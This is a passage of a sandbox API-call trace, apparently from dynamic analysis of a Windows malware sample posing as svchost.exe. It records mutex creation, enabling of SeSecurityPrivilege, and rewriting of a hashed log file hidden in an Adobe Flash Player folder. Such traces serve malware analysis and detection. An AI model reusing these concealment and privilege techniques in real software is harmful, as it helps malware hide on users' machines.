wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x19, wMilliseconds=0xd3)) [0122.793] SystemTimeToFileTime (in: lpSystemTime=0x735f1b0, lpFileTime=0x735f1a0 | out: lpFileTime=0x735f1a0) returned 1 [0122.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.793] GetUserNameExW () returned 0x1 [0122.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413048, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.794] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="8A") returned 2 [0122.794] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="B7") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="49") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="67") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="98") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="F6") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="14") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="59") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="35") returned 2 [0122.795] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="AA") returned 2 [0122.796] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="3E") returned 2 [0122.796] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="27") returned 2 [0122.796] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="60") returned 2 [0122.796] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.796] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.796] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.796] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.796] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.798] GetCurrentThread () returned 0xfffffffe [0122.798] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0122.798] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x2d0) returned 1 [0122.798] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0122.799] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.799] GetLastError () returned 0x0 [0122.799] CloseHandle (hObject=0x2d0) returned 1 [0122.799] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.799] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0122.799] SetNamedSecurityInfoW () returned 0x0 [0122.807] LocalFree (hMem=0x5214700) returned 0x0 [0122.807] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.807] GetCurrentThread () returned 0xfffffffe [0122.808] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0122.808] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x2d0) returned 1 [0122.808] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0122.809] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.809] GetLastError () returned 0x0 [0122.809] CloseHandle (hObject=0x2d0) returned 1 [0122.809] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.809] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0122.809] SetNamedSecurityInfoW () returned 0x0 [0122.811] LocalFree (hMem=0x5214700) returned 0x0 [0122.811] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0122.811] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x735f248 | out: lpFileSize=0x735f248*=4095) returned 1 [0122.812] VirtualAlloc (lpAddress=0x0, dwSize=0xfff, flAllocationType=0x3000, flProtect=0x4) returned 0x5340000 [0122.812] ReadFile (in: hFile=0x2d0, lpBuffer=0x5340000, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x735f254, lpOverlapped=0x0 | out: lpBuffer=0x5340000*, lpNumberOfBytesRead=0x735f254*=0xfff, lpOverlapped=0x0) returned 1 [0122.826] CloseHandle (hObject=0x2d0) returned 1 [0122.826] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366202") returned 10 [0122.827] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.828] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.830] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.831] wvnsprintfA (in: pszDest=0x5415108, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.831] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.832] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.833] wvnsprintfA (in: pszDest=0x54150e8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.835] wvnsprintfA (in: pszDest=0x54150e8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.836] wvnsprintfA (in: pszDest=0x5415068, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.837] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.838] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.838] wvnsprintfA (in: pszDest=0x5415108, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.839] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.840] wvnsprintfA (in: pszDest=0x54150e8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.841] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366205") returned 10 [0122.842] wvnsprintfA (in: pszDest=0x5415228, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366205") returned 10 [0122.843] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0122.911] WriteFile (in: hFile=0x2d0, lpBuffer=0x5403e30*, nNumberOfBytesToWrite=0x1101, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0 | out: lpBuffer=0x5403e30*, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0) returned 1 [0122.918] CloseHandle (hObject=0x2d0) returned 1 [0122.931] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.931] CloseHandle (hObject=0x1cc) returned 1 [0122.932] SetLastError (dwErrCode=0x0) [0122.932] GetLastError () returned 0x0 [0122.932] GetLocalTime (in: lpSystemTime=0x735f630 | out: lpSystemTime=0x735f630*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x19, wMilliseconds=0x160)) [0122.932] GetCurrentThreadId () returned 0xd70 [0122.932] GetCurrentProcessId () returned 0x2ec [0122.932] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5d4 | out: pszDest="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.932] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="updateplugin: No plugin url.", arglist=0x735f650 | out: pszDest="updateplugin: No plugin url.") returned 28 [0122.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0122.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x5415198, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x54154e0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0122.933] GetSystemTime (in: lpSystemTime=0x735f220 | out: lpSystemTime=0x735f220*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x19, wMilliseconds=0x160)) [0122.933] SystemTimeToFileTime (in: lpSystemTime=0x735f220, lpFileTime=0x735f210 | out: lpFileTime=0x735f210) returned 1 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54120f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.934] GetUserNameExW () returned 0x1 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413088, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.935] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="8A") returned 2 [0122.935] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.935] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.935] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.935] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="B7") returned 2 [0122.935] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="49") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="67") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="98") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="F6") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="14") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="59") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="35") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="AA") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="3E") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="27") returned 2 [0122.936] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="60") returned 2 [0122.936] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.937] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.937] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.937] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.937] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.937] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.937] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.938] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.938] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.938] GetCurrentThread () returned 0xfffffffe [0122.938] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0122.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x2d0) returned 1 [0122.938] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0122.941] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.941] GetLastError () returned 0x0 [0122.941] CloseHandle (hObject=0x2d0) returned 1 [0122.941] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.941] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214790, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0122.941] SetNamedSecurityInfoW () returned 0x0 [0122.952] LocalFree (hMem=0x5214790) returned 0x0 [0122.952] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.952] GetCurrentThread () returned 0xfffffffe [0122.952] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0122.952] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x2d0) returned 1 [0122.952] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0122.953] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.953] GetLastError () returned 0x0 [0122.953] CloseHandle (hObject=0x2d0) returned 1 [0122.954] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.954] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214790, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0122.954] SetNamedSecurityInfoW () returned 0x0 [0122.955] LocalFree (hMem=0x5214790) returned 0x0 [0122.955] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0122.956] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x735f2b8 | out: lpFileSize=0x735f2b8*=4353) returned 1 [0122.956] VirtualAlloc (lpAddress=0x0, dwSize=0x1101, flAllocationType=0x3000, flProtect=0x4) returned 0x5340000 [0122.956] ReadFile (in: hFile=0x2d0, lpBuffer=0x5340000, nNumberOfBytesToRead=0x1101, lpNumberOfBytesRead=0x735f2c4, lpOverlapped=0x0 | out: lpBuffer=0x5340000*, lpNumberOfBytesRead=0x735f2c4*=0x1101, lpOverlapped=0x0) returned 1 [0122.968] CloseHandle (hObject=0x2d0) returned 1 [0122.969] wvnsprintfA (in: pszDest=0x545a428, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366202") returned 10 [0122.970] wvnsprintfA (in: pszDest=0x545a368, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.971] wvnsprintfA (in: pszDest=0x545a2c8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.972] wvnsprintfA (in: pszDest=0x545a3e8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.972] wvnsprintfA (in: pszDest=0x545a248, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.973] wvnsprintfA (in: pszDest=0x545a2c8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.974] wvnsprintfA (in: pszDest=0x545a2e8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.977] wvnsprintfA (in: pszDest=0x545a2c8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.978] wvnsprintfA (in: pszDest=0x545a368, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.979] wvnsprintfA (in: pszDest=0x545a288, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.980] wvnsprintfA (in: pszDest=0x545a348, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.981] wvnsprintfA (in: pszDest=0x545a388, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.982] wvnsprintfA (in: pszDest=0x545a368, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.982] wvnsprintfA (in: pszDest=0x545a3e8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.984] wvnsprintfA (in: pszDest=0x545a3e8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.985] wvnsprintfA (in: pszDest=0x545a3c8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366205") returned 10 [0122.985] wvnsprintfA (in: pszDest=0x545a428, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366205") returned 10 [0122.986] wvnsprintfA (in: pszDest=0x545a328, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366205") returned 10 [0122.988] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e4 [0122.997] WriteFile (in: hFile=0x2e4, lpBuffer=0x5403e30*, nNumberOfBytesToWrite=0x11ef, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x5403e30*, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0) returned 1 [0122.998] CloseHandle (hObject=0x2e4) returned 1 [0123.034] 